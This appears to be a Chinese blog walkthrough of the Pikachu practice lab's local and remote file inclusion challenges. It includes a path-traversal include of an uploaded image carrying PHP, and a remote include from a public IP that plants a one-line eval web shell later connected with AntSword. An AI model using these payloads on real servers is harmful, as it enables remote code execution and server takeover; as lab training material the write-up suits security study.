pikachu文件包含漏洞靶场攻略

一、File inclusion(local)(本地文件包含)

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参   可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

文件上传成功

4.filename后面输入../../../../1.php访问php文件

二、File Inclusion(remote)(远程文件包含)

一,修改配置

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

二,随意提交查询

三,宝塔公网上创建一个6.txt文件,

里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>

四,filename后面输入http://47.121.212.101/6.txt

五,fileinclude目录下找到php文件

六,访问php文件,蚁剑连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值